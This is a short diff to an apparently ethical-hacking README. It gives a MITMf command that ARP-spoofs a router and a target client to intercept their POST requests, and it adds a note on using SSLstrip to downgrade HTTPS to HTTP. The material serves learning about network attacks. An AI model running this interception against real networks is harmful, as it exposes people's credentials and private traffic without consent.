RodgerOliver/ethical-hacking/README.md

   * `mitmf --arp --spoof --gateway <router IP> --target <target client IP> -i wlan0`

-This way you can see all the post request made by the target client
+This way you can see all the post request made by the target client To bypass HTTPS request use SSLstrip to downgrade HTTPS to an HTTP request